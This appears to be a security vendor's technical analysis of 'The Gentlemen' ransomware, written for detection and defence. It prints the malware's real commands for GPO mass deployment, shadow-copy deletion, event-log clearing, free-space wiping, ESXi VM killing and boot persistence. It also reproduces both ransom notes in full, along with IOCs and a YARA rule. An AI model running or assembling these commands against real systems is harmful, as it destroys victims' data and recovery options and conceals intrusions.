    <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}"
        name="$TaskName" image="0" changed="<timestamp>" uid="<uid>"
        userContext="0" removePolicy="0">
      <Properties action="C" name="$TaskName"
          runAs="NT AUTHORITY\\System" logonType="S4U"/>
      ...
      <BootTrigger><Enabled>true</Enabled></BootTrigger>
      <RegistrationTrigger><Enabled>true</Enabled></RegistrationTrigger>
      <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
      <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
      <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
      <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    </ImmediateTaskV2>
  </ScheduledTasks>
  "@ | Out-File -Encoding UTF8 -FilePath $TaskXmlPath -Force

  Copy-Item -Path $TaskXmlPath -Destination "$GpoScheduledPath\\ScheduledTasks.xml" -Force

  if (!(Test-Path $GpoScheduledPath)) {
      # path creation guard
  }

  $comps = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
  foreach ($_ in $comps) {
      Invoke-GPUpdate -Computer $_.name -RandomDelayInMinutes 0
          -Force -ErrorAction SilentlyContinue
      Invoke-Command -ComputerName $comp -ScriptBlock { gpupdate /force }
          -ErrorAction SilentlyContinue
  }

Drive Enumeration

For drive enumeration, the malware uses two techniques to identify available volumes:

  1. PowerShell‑based discovery, using the following command.
  2. Brute‑force drive letter scan, iterating from A: to Z: and calling os.Stat on each path to determine whether it is a valid drive.
powershell -NoProfile -Command "$volumes=@();
$volumes += Get-WmiObject -Class Win32_Volume |
    Where-Object { $_.Name -like ':\\' } |
    Select-Object -ExpandProperty Name;
try {
    $volumes += Get-ClusterSharedVolume |
        ForEach-Object { $_.SharedVolumeInfo.FriendlyVolumeName }
} catch {}
$volumes"

Network Enumeration

In order to enumerate network drives the ransomware executes a sequence of Windows commands that force-enable network discovery and related services, making the machine visible and reachable on the local network.

 sc config fdrespub start=auto
 sc start  fdrespub
 sc config fdPHost  start=auto
 sc start  fdPHost
 sc config SSDPSRV  start=auto
 sc start  SSDPSRV
 sc config upnphost start=auto
 sc start  upnphost
 netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
 powershell -Command Get-NetFirewallRule -DisplayGroup "Network Discovery" | Enable-NetFirewallRule

Then loads dynamically mpr.dll and by using the Windows API functions enumerates the networks shares:

  • WNetOpenEnumW
  • WNetEnumResourceW
  • WNetCloseEnum

Directories, Filenames and Extensions Exclusion

As with many other ransomware families, this one also excludes specific directories, filenames, and file extensions from encryption, ensuring that the system remains at least partially usable after the attack.

Excluded Directories:

"c:\\\\windows", "system volume information", "c:\\\\intel", "admin$", "ipc$", "! Cynet Ransom Protection(DON\\'T DELETE)", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "c:\\\\program files\\\\microsoft", "c:\\\\program files (x86)\\\\microsoft", "c:\\\\program files (x86)\\\\intel", "$windows.~bt", "msocache", "WinSxS", "$Recycle.Bin", "c:\\\\program files\\\\windows", "c:\\\\program files (x86)\\\\windows", "c:\\\\program files\\\\intel", "tor browser", "boot", "config.msi", "google", "System32", "perflogs", "appdata", "windows.old"

Excluded Filenames:

desktop.ini, autorun.ini, ntldr, bootsect.bak, thumbs.db, boot.ini, ntuser.dat, iconcache.db, bootfont.bin, pagefile.sys, ntuser.ini, ntuser.dat.log, autorun.inf, bootmgr, hiberfil.sys, bootmgr.efi, bootmgfw.efi, #recycle, README-GENTLEMEN.txt"c:\\\\windows", "system volume information", "c:\\\\intel", "admin$", "ipc$", "! Cynet Ransom Protection(DON\\'T DELETE)", "sysvol", "netlogon", "$windows.~ws", "application data", "mozilla", "c:\\\\program files\\\\microsoft", "c:\\\\program files (x86)\\\\microsoft", "c:\\\\program files (x86)\\\\intel", "$windows.~bt", "msocache", "WinSxS", "$Recycle.Bin", "c:\\\\program files\\\\windows", "c:\\\\program files (x86)\\\\windows", "c:\\\\program files\\\\intel", "tor browser", "boot", "config.msi", "google", "System32", "perflogs", "appdata", "windows.old"

Excluded Extensions:

hemepack, nls, diapkg, msi, lnk, exe, scr, bat, drv, rtp, msp, prf, msc, ico, key, ocx, hosts, diagcab, diagcfg, pdb, wpx, hlp, icns, rom, dll, msstyles, mod, ps1, ics, hta, bin, cmd, ani, 386, lock, cur, idx, sys, com, deskthemepack, shs, theme, mpa, gif, mp3, nomedia, spl, cpl, adv, icl, msu

Shadow Copy & Logs Deletion

During execution, the ransomware attempts to delete shadow copies, which are a primary mechanism for recovering encrypted files:

  • vssadmin delete shadows /all /quiet
  • wmic shadowcopy delete
  • rd /s /q C:\\$Recycle.Bin

In addition to shadow copies, the ransomware also deletes various log files. These logs typically contain authentication events, process and service creation events, and traces of lateral movement. The destruction of these artifacts clearly aims to remove forensic evidence of the intrusion and hinder post-incident investigation.

wevtutil cl System
wevtutil cl Application
wevtutil cl Security
del /f /q C:\\Windows\\Prefetch\\*.*
del /f /q C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*
del /f /q %SystemRoot%\\System32\\LogFiles\\RDP*\\*.*

Free Space Wiping

When the threat actor executes the ransomware with the --wipe argument, the malware additionally attempts to wipe free disk space. It creates a file named wipefile.tmp on each targeted drive and writes 64 MB chunks of data to it until all free space is exhausted. This process overwrites previously deleted file content that could otherwise be recovered using forensic tools.

Background Image Change

If the --silent argument is not specified, the ransomware replaces the desktop background with an embedded image. The image resource is written to %TEMP%\\gentlemen.bmp, and the malware then calls SystemParametersInfoW to set it as the desktop wallpaper.

File Encryption

Before encryption begins, the ransomware checks whether the file size exceeds 0x100000 (1,048,576 bytes, or 1 MB). Files of 1 MB or smaller are routed to the small file function, while files larger than 1 MB are routed to the large file function.

Regardless of size, the key derivation process is identical for both paths. The ransomware generates a random 32-byte ephemeral private key. Using X25519 (the Diffie–Hellman primitive over Curve25519), it derives two values: first, the ephemeral public key by multiplying the private key with the curve basepoint, and second, a shared secret by combining the ephemeral private key with the attacker’s public key. The ephemeral public key is not secret and will later be stored in the file, while the shared secret remains only in memory. Key material for encryption is then constructed directly from these values. The ephemeral public key is used as the 32-byte symmetric key, while the first 24 bytes of the shared secret (derived with the attacker’s public key) are used as the nonce.

For small files (less than 1MB) the contents are encrypted using XChaCha20, a stream cipher, which XORs the plaintext with a keystream to produce ciphertext of identical length. The original file is overwritten in place with this ciphertext.

For large files larger than 1 MB, the encryption process changes depending on optional speed mode arguments that control how much of the file is actually encrypted. Instead of processing the entire file, the algorithm only encrypts a small portion of it. In fast mode about 9 percent of the file is encrypted. In superfast mode about 3 percent is encrypted. In ultrafast mode only about 1 percent of the file is affected. The encrypted regions are selected across the file and processed in chunks of about 64 KB. Each chunk is read, encrypted using XChaCha20, and written back to the same position in the file. After encryption, the function appends a footer to the file containing the string --eph--, followed by the base64-encoded ephemeral public key and a newline. This is followed by a marker section --marker--GENTLEMEN\\n and a final GENTLEMEN sentinel. The stored ephemeral public key allows the attacker, who possesses the corresponding private key, to recompute the shared secret and reconstruct the nonce, enabling decryption of the file. If any of the speed-increasing arguments (fast, superfast, or ultrafast) were specified during large file encryption, the selected argument is also appended to the end of the file.

--eph--$BASE64--marker--GENTLEMEN\nGENTLEMEN--fast--\n

The attacker’s decryptor obtains the base64 value from the header (--eph-- field), decodes it to get the ephemeral public key, and uses it directly as the ChaCha20 key. It then recomputes sharedSecret = X25519(attacker_privKey, ephemeralPubKey) using the attacker’s own private key, and uses the first 24 bytes of sharedSecret2 as the ChaCha20 nonce. With the key and nonce recovered, it decrypts the encrypted files.


The Gentlemen ESXi Variant

Latest ELF variant of The Gentlemen ransomware remains undetected by the majority of the Antivirus systems as seems in VirusTotal. The incapability to trigger and execute the malicious code due to the --password requirement possibly affects the detection results, even though for Windows samples this does not appear to be an issue.

Figure 8 — VirusTotal detection rate.

Command Line Arguments

The majority of the arguments functionalities are observed as well in the ELF variant of The Gentlemen ransomware.

Usage: %s --password PASS --path DIR [--ignore VMS] [--T MIN] [--fast] [--superfast] [--ultrafast]

Main Flags 
  --password PASS         Access password (required)
  --path DIR              Target directories, comma-separated (required)
                          Example:  --path /vmfs/
                          Example2: --path "/vmfs/,/datastore/,/mnt/storage"
  --ignore VMS            VM display names to ignore, comma-separated (optional)
                          Example:  --ignore DomainController
                          Example2: --ignore "DomainController,Backup Server"
  --T, --timer MIN        Delay before start in minutes (optional)
                          Example:  --T 15
                          Example2: --timer 15

Speed Flags (can't be mixed) 
  --fast                  Lock 9 percent of file (optional)
  --superfast             Lock 3 percent of file (optional)
  --ultrafast             Lock 1 percent of file (optional)

[+]

The ESXi variant exposes fewer functionalities than the Windows variant, as many features present in the Windows version are not required on ESXi systems.

Flag / ArgumentWindowsESXi
--password PASSAccess password (required)Access password (required)
--path DIRS / DIRComma-separated list of target directories/disks (optional). Example: --path "C:\\,D:\\,\\\\nas\\share"Target directories, comma-separated (required).
Example: --path "/vmfs/,/datastore/,/mnt/storage"
--T MINDelay before start, in minutes (optional)Delay before start in minutes (optional)
--timer $MINNot presentAlias for delay before start in minutes (optional)
--systemRun as SYSTEM; encrypt only local drivesNot present
--sharesEncrypt only mapped network drives and UNC shares in session contextNot present
--fullTwo-phase: --system + --shares (“Best practice”)Not present
--spread $CREDSLateral movement: "domain/user:pass" or "" for current sessionNot present
--gpoDeploy via Group Policy to all domain computers (run on DC)Not present
--silentSilent mode: do not rename/retime files; no wallpaper changeNot present
--keepDo not self-delete after encryptionNot present
--wipeWipe free space after encryptionNot present
--ignore VMSNot presentVM display names to ignore, comma-separated.
Example: --ignore "DomainController,Backup Server"
--fast9 percent crypt. (optional)Lock 9 percent of file (optional)
--superfast3 percent crypt. (optional)Lock 3 percent of file (optional)
--ultrafast1 percent crypt. (optional)Lock 1 percent of file (optional)

The minimum required command‑line for Linux Gentlemen ransomware execution is:

$process_name --password $pass --path $path(s)

VM & Processes Termination

Ransomware operators shut down virtual machines on an ESXi host to make their attack more effective and efficient. By powering off the VMs, they release locks on virtual disk files, allowing those files to be encrypted more reliably and with less risk of interference or corruption. This also disables any security tools running inside the guest systems, reducing the chance of detection or response.

The locker performs a controlled shutdown of all virtual machines on a VMware ESXi host. It first lists all registered VMs and iterates through them to issue a graceful power-off command (optionally skipping specified VMs). After a short wait to allow clean shutdowns, it checks for any remaining running VM processes using esxcli. If any VMs are still active, it forcefully terminates them by killing their associated world processes. In effect, it ensures that all VMs are stopped, using escalation from graceful shutdown to hard kill only when necessary.

# Enumerate all registered VMs (popen, output parsed line by line)
vim-cmd vmsvc/getallvms | tail -n +2

# Power off each VM gracefully (one system() call per VM, skipping --ignore list)
vim-cmd vmsvc/power.off <vmid> > /dev/null 2>&1

# After 8-second sleep: enumerate still-running VM processes (popen)
esxcli --formatter=csv vm process list | tail -n +2

# Force-kill any remaining VM processes by world-id (one per process)
esxcli vm process kill --type=force --world-id=<world_id> > /dev/null 2>&1

Persistence

The ransomware copies itself to /bin/.vmware-authd mimicking a legitimate VMware daemon.

cp -f '<self>' '/bin/.vmware-authd' 2>/dev/null && chmod +x '/bin/.vmware-authd'

Then creates a script file that ESXi runs at boot.

mkdir -p /etc/rc.local.d 2>/dev/null; \\
echo '#!/bin/sh' > '/etc/rc.local.d/local.sh'; \\
echo 'sleep 30 && /bin/.vmware-authd <original_argv> &' >> '/etc/rc.local.d/local.sh'; \\
chmod +x '/etc/rc.local.d/local.sh'

Adds a second persistence layer via crontab. At every reboot, after a 60-second delay, the ransomware relaunches via the hidden binary with the original arguments.

echo '@reboot sleep 60 && /bin/.vmware-authd <original_argv>' | crontab - 2>/dev/null

Pre-Encryption Preparation

The ransomware modifies a VMware ESXi host to prepare the storage layer for fast, consistent disk writes and then disables automatic VM recovery. It increases the VMFS write buffer capacity and adjusts the flush interval to control how data is committed to disk, then forces synchronous writes across all VMFS datastores by briefly creating and deleting eager-zeroed thick disks. Finally, it clears and disables the VM autostart configuration so virtual machines will not restart automatically after a reboot.

# Maximize VMFS write buffer capacity (speeds up encryption throughput)
esxcfg-advcfg -s 32768 /BufferCache/MaxCapacity > /dev/null 2>&1

# Reduce buffer flush interval (forces faster disk commit)
esxcfg-advcfg -s 20000 /BufferCache/FlushInterval > /dev/null 2>&1

# Create eagerzeroedthick disk on every VMFS-5 datastore (forces buffer flush before encryption — ensures plaintext is written to disk)
for I in $(esxcli storage filesystem list | grep 'VMFS-5' | awk '{print $1}'); do \\
  vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null 2>&1; \\
  vmkfstools -U $I/eztDisk > /dev/null 2>&1; \\
done 2>&1

# Same as above for VMFS-6 datastores
for I in $(esxcli storage filesystem list | grep 'VMFS-6' | awk '{print $1}'); do \\
  vmkfstools -c 10M -d eagerzeroedthick $I/eztDisk > /dev/null 2>&1; \\
  vmkfstools -U $I/eztDisk > /dev/null 2>&1; \\
done 2>&1

# Clear ESXi VM autostart configuration (prevents VMs from restarting)
vim-cmd hostsvc/autostartmanager/clear_autostart > /dev/null 2>&1

# Disable autostart manager entirely
vim-cmd hostsvc/autostartmanager/enable_autostart 0 > /dev/null 2>&1

Directories, Filenames and Extensions Exclusion

The ransomware implements a targeted exclusion list to avoid encrypting critical components of the underlying VMware ESXi / Linux-based operating system, as well as associated virtualization and boot infrastructure.

Directories:

/boot/, /proc/, /sys/, /run/, /dev/, /lib/, /etc/, /bin/, /mbr/, /lib64/, /vmware/lifecycle/, /vdtc/, /healthd/

File types:

vmsd, sf, vmx~, lck, vmx, nvram, v00, v01, v02, v03, v04, v05, v06, v07, v08, v09, b00, b01, b02, b03, b04, b05, b06, b07, b08, b09, t00, t01, t02, t03, t04, t05, t06, t07, t08, t09, locker, unlocker, .go, .exe

Files:

initrd, vmlinuz, basemisc.tgz, README-GENTLEMEN.txt, boot.cfg, bootpart.gz, features.gz, imgdb.tgz, jumpstrt.gz, onetime.tgz, state.tgz, useropts.gz


Conclusion

The activity surrounding The Gentlemen RaaS underscores how quickly a well‑designed affiliate program can evolve from newcomer to a high‑impact ecosystem player. By combining a versatile, multi‑platform locker set with built‑in lateral movement, Group Policy–based mass deployment, and strong defense‑evasion capabilities, the operation enables even moderately skilled affiliates to execute enterprise‑scale intrusions with ransomware detonation as the final stage.

The observed use of SystemBC alongside Cobalt Strike, and the discovery of a botnet with more than 1,570 likely corporate victims, further highlights that The Gentlemen affiliates are not operating in isolation, but are actively integrating into a broader toolchain of mature, post‑exploitation frameworks and proxy infrastructure. Organizations should therefore treat The Gentlemen not as an isolated family, but as part of a wider, modular intrusion ecosystem where initial access, post‑exploitation, and encryption capabilities can be rapidly recombined and reused across campaigns.


Indicators of Compromise

DescriptionValue
Cobalt Strike C&C91.107.247[.]163
SystemBC992c951f4af57ca7cd8396f5ed69c2199fd6fd4ae5e93726da3e198e78bec0a5
SystemBC C&C45.86.230[.]112
The Gentlemen Windows025fc0976c548fb5a880c83ea3eb21a5f23c5d53c4e51e862bb893c11adf712a
22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67
2ed9494e9b7b68415b4eb151c922c82c0191294d0aa443dd2cb5133e6bfe3d5d
3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235
48d9b2ce4fcd6854a3164ce395d7140014e0b58b77680623f3e4ca22d3a6e7fd
62c2c24937d67fdeb43f2c9690ab10e8bb90713af46945048db9a94a465ffcb8
860a6177b055a2f5aa61470d17ec3c69da24f1cdf0a782237055cba431158923
87d25d0e5880b3b5cd30106853cbfc6ef1ad38966b30d9bd5b99df46098e546c
8c87134c1b45e990e9568f0a3899b0076f94be16d3c40fa824ac1e6c6ee892db
91415e0b9fe4e7cbe43ec0558a7adf89423de30d22b00b985c2e4b97e75076b1
994d6d1edb57f945f4284cc0163ec998861c7496d85f6d45c08657c9727186e3
9f61ff4deb8afced8b1ecdc8787a134c63bde632b18293fbfc94a91749e3e454
a7a19cab7aab606f833fa8225bc94ec9570a6666660b02cc41a63fe39ea8b0ad
b67958afc982cafbe1c3f114b444d7f4c91a88a3e7a86f89ab8795ac2110d1e6
c46b5a18ab3fb5fd1c5c8288a41c75bf0170c10b5e829af89370a12c86dd10f8
c7f7b5a6e7d93221344e6368c7ab4abf93e162f7567e1a7bcb8786cb8a183a73
ec368ae0b4369b6ef0da244774995c819c63cffb7fd2132379963b9c1640ccd2
efaf8e7422ffd09c7f03f1a5b4e5c2cc32b05334c18d1ccb9673667f8f43108f
f736be55193c77af346dbe905e25f6a1dee3ec1aedca8989ad2088e4f6576b12
fc75ed2159e0c8274076e46a37671cfb8d677af9f586224da1713df89490a958
Embedded binaries (psexesvc.exe/psexec.exe)cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
gentlemen.bmpfe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68
The Gentlemen Linux5dc607c8990841139768884b1b43e1403496d5a458788a1937be139594f01dca
788ba200f776a188c248d6c2029f00b5d34be45d4444f7cb89ffe838c39b8b19
1eece1e1ba4b96e6c784729f0608ad2939cfb67bc4236dfababbe1d09268960c


Yara Rule

rule thegentlemen_ransomware
{
    meta:
        author = "@Tera0017/Check Point Research"
        description = "The Gentlemen Ransomware written in GO."
    strings:
        $string1 = "Silent mode (don't rename files)" ascii
        $string2 = "Encrypt only mapped and UNC network shares" ascii
        $string3 = "README-GENTLEMEN.txt" ascii
        $string4 = "gentlemen.bmp" ascii
        $string5 = "gentlemen_system" ascii
        $string6 = "[+] Encryption started. Going background..." ascii
        $string7 = "[+] FULL Encryption started" ascii
    condition:
        uint16(0) == 0x5A4D and 4 of them
}


Ransomware Note – README-GENTLEMEN.txt

Windows Version:

{VICTIM_ID} {VICTIM}= YOUR ID

Gentlemen, your network has been encrypted.

1. Any modification of encrypted files will make recovery impossible. 
2. Only our unique decryption key and software can restore your files. 
   Brute-force, RAM dumps, third-party recovery tools are useless.
   It’s a fundamental mathematical reality. Only we can decrypt your data.
3. Law enforcement, authorities, and “data recovery” companies will NOT help you.
   They will only waste your time, take your money, and block you from recovering your files — your business will be lost.
4. Any attempt to restore systems, or refusal to negotiate, may lead to irreversible wipe of all data and your network.
5. We have exfiltrated all your confidential and business data (including NAS, clouds, etc). 
   If you do not contact us, it will be published on our leak site and distributed to major hack forums and social networks.
   In addition, it will be reported to the relevant data protection authorities and regulators.
   This may result in official investigations, significant fines, and reputational damage for your company.
6. We guarantee 100% file recovery to their original state, bit by bit.
   To demonstrate the quality of our work, you can provide three sample files, and we will restore them free of charge.

TOX CONTACT - RECOVER YOUR FILES
Contact us (add via TOX ID): D527959A7BC728CB272A0DB683B547F079C98012201A48DD2792B84604E8BC29F6E6BDB8003F
Download Tox messenger: <https://tox.chat/download.html>
Contact us (add via Session ID): {SESSION_ID}
Download Session  <https://getsession.org>

СONTACT TO PREVENT DATA LEAK (7 DAYS BEFORE YOUR COMPANY DATA WILL BE PUBLISHED IN OUR BLOG, WITH 239 HOURS REVEAL TIMER)
Check our blog: hxxp://tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion/ 
Download Tor browser: <https://www.torproject.org/download/>
Follow us on X: hxxps://x.com/TheGentlemen25

Any other means of communication are fake and may be set up by third parties. 
Only use the methods listed in this note or on the specified website.
After adding (us) in Tox or Session, please wait for your request to be processed and stay online.
If you do not receive a reply within 36 hours, create another account and contact us again.
In your first message in chat, immediately provide your ID from the note and the name of your organization. 
Assign one person as contact responsible for all negotiations. Do not create multiple chats.

ESXi Version:

{VICTIM_ID} = YOUR ESXI ID

Gentlemen, your ESXI has been encrypted.

1. Any modification of encrypted files will make recovery impossible. 
2. Only our unique decryption key and software can restore your files. 
   Brute-force, RAM dumps, third-party recovery tools are useless.
   It’s a fundamental mathematical reality. Only we can decrypt your data.
3. Law enforcement, authorities, and “data recovery” companies will NOT help you.
   They will only waste your time, take your money, and block you from recovering your files — your business will be lost.
4. Any attempt to restore systems, or refusal to negotiate, may lead to irreversible wipe of all data and your network.
5. We have exfiltrated all your confidential and business data (including NAS, clouds, etc). 
   If you do not contact us, it will be published on our leak site and distributed to major hack forums and social networks.
   In addition, it will be reported to the relevant data protection authorities and regulators.
   This may result in official investigations, significant fines, and reputational damage for your company.
6. We guarantee 100% file recovery to their original state, bit by bit.
   To demonstrate the quality of our work, you can provide two sample files, and we will restore them free of charge.

TOX CONTACT - RECOVER YOUR FILES
Contact us (add via TOX ID): D2CBA43A1AF6D965432AE11487726DB84D2945CF2CD975D7774B76B54AF052418AC2E59ADA69
Download Tox messenger: <https://tox.chat/download.html>
Contact us (add via Session ID): {SESSION_ID}
Download Session  <https://getsession.org>

СONTACT TO PREVENT DATA LEAK (7 DAYS BEFORE YOUR COMPANY DATA WILL BE PUBLISHED IN OUR BLOG, WITH 239 HOURS REVEAL TIMER)
Check our blog: hxxp://tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad.onion/ 
Download Tor browser: <https://www.torproject.org/download/>
Follow us on X: <https://x.com/TheGentlemen25>

Any other means of communication are fake and may be set up by third parties. 
Only use the methods listed in this note or on the specified website.


MITRE ATT&CK Matrix

TacticTechnique / Sub‑TechniqueDescription
Initial AccessValid Accounts (T1078)Attacker already active on Domain Controller with Domain Admin privileges; --spread "domain\\user:password" uses harvested domain credentials for remote execution and lateral movement.
Initial AccessExternal Remote Services (T1133(inferred)Initial entry not directly observed; context suggests possible compromise via exposed remote services (e.g., RDP/VPN), but campaign evidence starts post‑compromise on DC.
ExecutionCommand Shell (T1059.003)Widespread cmd.exe /C usage: systeminfowhoamidir c:\\userstype \\\\host\\share\\file.txttaskkillgpupdate /forcenetrd, etc.
ExecutionPowerShell (T1059.001)Defender tampering and firewall changes via PowerShell; internal HTTP download of grand.exe to c:\\programdata\\r.exe; extensive script‑based lateral movement using Invoke-Command and multi‑step PowerShell scripts (SCRIPT_ASCRIPT_G).
ExecutionWindows Management Instrumentation (T1047)wmic /node:<target> process call create "<DEFENDER_SCRIPT_A>" and wmic ... "C:\\Temp\\<exe> <creds>" to execute scripts and lockers on remote hosts.
ExecutionScheduled Task/Job: Scheduled Task (T1053.005)Creation of local and remote tasks: UpdateSystemUpdateUserDefUDefSUpdateGUUpdateGU2UpdateGSUpdateGS2 using schtasks /Create /S <target> ... /Run for execution and persistence.
ExecutionSystem Services: Service Execution (T1569.002)Remote services DefSvcUpdateSvcUpdateSvc2 created and started via sc \\\\<target> create ... and sc \\\\<target> start ... to run ransomware or helper scripts.
ExecutionNative API (T1106)Use of SystemParametersInfoW to set gentlemen.bmp as wallpaper; dynamic loading of mpr.dll and calls to WNetOpenEnumWWNetEnumResourceWWNetCloseEnum to enumerate network shares.
ExecutionUser Execution: Malicious File (T1204.002)Operator‑driven execution of ransomware payloads (r.exeg.exeo.exe, GPO‑deployed locker) on endpoints as final stage of intrusion.
PersistenceScheduled Task/Job: Scheduled Task (T1053.005)Local persistence via schtasks /Create /SC ONSTART /TN UpdateSystem /TR "<exe> <args>" /RU SYSTEM; remote tasks on many hosts ensure repeated execution and durability of the locker.
PersistenceRegistry Run Keys / Startup Folder (T1060)Run key added: reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v GupdateU /t REG_SZ /d "<exe>" /f to autostart ransomware in user context.
PersistenceCreate or Modify System Process: Windows Service (T1543.003)Creation of new services (DefSvcUpdateSvcUpdateSvc2) on remote hosts to execute ransomware or helper logic, typically running as SYSTEM.
PersistenceBoot or Logon Autostart Execution: rc.local (T1547.009)ESXi/Linux variant copies itself to /bin/.vmware-authd and configures /etc/rc.local.d/local.sh with sleep 30 && /bin/.vmware-authd <original_argv> & to auto‑run on boot.
PersistenceScheduled Task/Job: Cron (T1053.003)ESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
PersistenceBoot or Logon Initialization Scripts (T1037.004)Combined use of rc.local (/etc/rc.local.d/local.sh) and cron @reboot scripts ensures the locker relaunches after ESXi host reboot.
PersistenceIngress Tool Transfer (T1105)--gpo deployment mode copies locker to \\\\<domain>\\NETLOGON\\<exe> and injects ScheduledTasks.xml into GPO path; all domain machines then pull and execute the locker via GPO‑scheduled tasks.
Privilege EscalationValid Accounts (T1078)Stolen Domain Admin and other domain credentials used with PsExec (-u <domain\\user> -p <pass>) and --spread to perform privileged remote execution and lateral movement.
Privilege EscalationScheduled Task/Job: Scheduled Task (T1053.005)Tasks created to run as SYSTEM (/RU SYSTEM) – locally and via GPO – escalate from user to LocalSystem context for file encryption and defense evasion.
Privilege EscalationCreate or Modify System Process: Windows Service (T1543.003)Attackers create new services configured to run under high‑privilege service accounts (usually SYSTEM) on remote hosts to execute ransomware components.
Defense EvasionImpair Defenses: Disable or Modify Tools (T1562.001)Defender disabled and neutered via Set-MpPreference -DisableRealtimeMonitoring $true; exclusions added for C:\\C:\\Temp\\\\<host>\\share$, and the ransomware process; these operations are performed locally and remotely via scripts.
Defense EvasionImpair Defenses: Disable or Modify System Firewall (T1562.004)Firewall disabled globally: netsh advfirewall set allprofiles state offSet-NetFirewallProfile -Profile Domain,Public,Private -Enabled False; firewall service mpssvc is stopped and set to disabled.
Defense EvasionImpair Defenses: Disable or Modify Cloud/Network Security (T1562.007)Attackers enable SMB1 (Enable-WindowsOptionalFeature ... SMB1Protocol), loosen LSA anonymous access (EveryoneIncludesAnonymous=1RestrictAnonymous=0), and set open network shares using net share + icacls, reducing network/segmentation protections.
Defense EvasionIndicator Removal on Host: Clear Windows Event Logs (T1070.001)wevtutil cl Systemwevtutil cl Applicationwevtutil cl Security executed to remove Windows event logs and hinder forensic reconstruction.
Defense EvasionIndicator Removal on Host: File Deletion (T1070.004)Forensic artefacts removed: prefetch (C:\\Windows\\Prefetch\\*.*), Defender logs (C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*.*), RDP logs (%SystemRoot%\\System32\\LogFiles\\RDP*\\*.*), $Recycle.Bin, plus overwriting free space via wipefile.tmp with 64 MB chunks.
Defense EvasionIndicator Removal on Host: Timestomp (T1070.006(implied)Report notes --silent avoids file renaming and timestamp changes; default behavior implied to alter names/timestamps, hampering timeline reconstruction and signature‑based detection.
Defense EvasionMasquerading: Masquerade Task or Service (T1036.004)ESXi locker placed at /bin/.vmware-authd, masquerading as legitimate VMware vmware-authd daemon.
Defense EvasionMasquerading: Match Legitimate Name or Location (T1036.005)Ransomware components use generic names (r.exeg.exeo.exe) and common locations (C:\\ProgramData\\C:\\Temp\\, admin shares) to blend with normal tools and admin activity.
Defense EvasionHide Artifacts: Hidden Window / Binary (T1564.003)ESXi binary uses a leading dot .vmware-authd to stay hidden; --silent mode on Windows avoids visible UI changes like wallpaper and renaming, running ransomware quietly in the background.
Defense EvasionObfuscated/Encrypted Artifacts (T1027)Per‑file ephemeral X25519 keys and XChaCha20 encryption plus footer markers (`–eph–<base64_ephemeral_pubkey>–marker–GENTLEMEN\nGENTLEMEN[–fast
Credential AccessOS Credential Dumping (T1003)Mimikatz artefacts recovered from memory show dumping of domain credentials and stored secrets from compromised workstations.
Credential AccessCredentials from Password Stores (T1555)Mimikatz dumping likely includes passwords from Windows Credential Manager/password stores, used later for --spread and PsExec.
DiscoverySystem Information Discovery (T1082)cmd.exe /C systeminfo run on compromised hosts to gather OS and hardware information.
DiscoveryAccount Discovery (T1033)cmd.exe /C whoami to confirm identity and context on multiple hosts.
DiscoveryAccount Discovery: Domain Account (T1087.002)net group "Domain Admins" /domain and net group "Enterprise Admins" /domain executed to enumerate domain‑level privileged groups.
DiscoveryDomain Trust Discovery (T1482)nltest /domain_trustsnltest /dclist (implied) to identify domain trust relationships and domain controllers.
DiscoveryRemote System Discovery (T1018)Domain computers enumerated via Get-ADComputer -Filter *; each host pinged to confirm reachability before executing lateral movement steps.
DiscoveryPermission Groups Discovery: Domain Groups (T1069.002)net group "Domain Admins" /domain and similar commands to discover privileged group membership.
DiscoveryNetwork Share Discovery (T1135)mpr.dll dynamically loaded; WNetOpenEnumWWNetEnumResourceWWNetCloseEnum used to enumerate available network shares after enabling network discovery services.
DiscoveryFile and Directory Discovery (T1083)cmd.exe /C dir c:\\users; reading internal files (e.g., Chinese language “公司主機紀錄.txt”) on file servers via UNC paths.
DiscoverySoftware Discovery: Security Software Discovery (T1518.001)wmic product where Name like '%kaspe%' get Name, IdentifyingNumber executed to identify installed Kaspersky (or similar) security products.
DiscoveryNetwork Service Scanning (T1046(partly inferred)While explicit port scans are not shown, large‑scale multi‑protocol lateral attempts via PsExec, WMI, remote services, and scheduled tasks after pinging hosts imply service reachability probing.
Lateral MovementRemote Services: SMB/Windows Admin Shares (T1021.002)Payloads dropped to \\\\<hostname>\\ADMIN$\\<random>.exe\\\\<target>\\C$\\Temp\\<exe>; share share$=C:\\Temp created and ACLs widened via icacls to support anonymous/Everyone access.
Lateral MovementRemote Services: RPC (T1021.001)Cobalt Strike and subsequent ransomware payloads executed over RPC from the Domain Controller after being copied to admin shares.
Lateral MovementRemote Services & Service Execution (T1021.001 + T1569.002)psexec \\\\<target> -accepteula -d -s/-h ... for remote execution, along with remote sc create/sc start to run services DefSvcUpdateSvc*.
Lateral MovementRemote Services: Windows Remote Management (T1021.006)PowerShell Invoke-Command -ComputerName <target> -ScriptBlock {...} used to disable Defender, set exclusions, and start lockers on remote machines.
Lateral MovementWindows Management Instrumentation (T1047)wmic /node:<target> process call create "<DEFENDER_SCRIPT_A>" and wmic /node:<target> process call create "C:\\Temp\\<exe> <creds>" to run scripts and lockers remotely.
